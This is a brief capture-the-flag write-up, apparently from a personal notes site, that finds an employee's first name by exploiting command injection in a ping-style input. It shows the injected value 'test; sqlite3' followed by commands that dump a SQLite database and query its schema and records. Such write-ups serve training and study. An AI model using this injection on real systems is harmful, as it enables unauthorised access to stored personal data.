![7efa65ab29a9753391142843f38b13ca.png](ed089049494d460080c24e3c5f563a9a.png)
Need to find the first name of 'Chan'.
`2`
![200ee1e09593703e0f30b0a66e48737f.png](085963f26dbd429cbff95fff7fdaf7bf.png)
It's a ping command? Command injection?
![ab62a5a5bf9d8f4cdd33782200e55151.png](45cff9da95f1427e95999ee39863f429.png)
Command injection it is
`test; sqlite3`
`.open onboard.db`
`.dump`
![41cb2f4e34609346dc62abe0f76e8c99.png](ce880522590b48a0a92541ee77ea926e.png)
Instead of fishing through all of the data, let's do it an easier way
`select sql from sqlite_master;`
![b64ecb4d7ce61a1609ebc40b9d8f6ed3.png](6ac44846ff2743ce8f87b959aa551f57.png)
We now know that the column containing last names is named 'lname'
`select * from onboard where lname = 'Chan'`
![65754a29344a590c17ebb1925d729bcb.png](c53380d9d4464b04b87538d0537d743c.png)
Looks like his first name is Scott
Let's go back to the start and run the 'runtoanswer' program
![8ce2f064b67e45110bc03d574aac3e4b.png](848347c495aa42b1a5d6fdc76d4a149e.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #sql #command_injection
Related: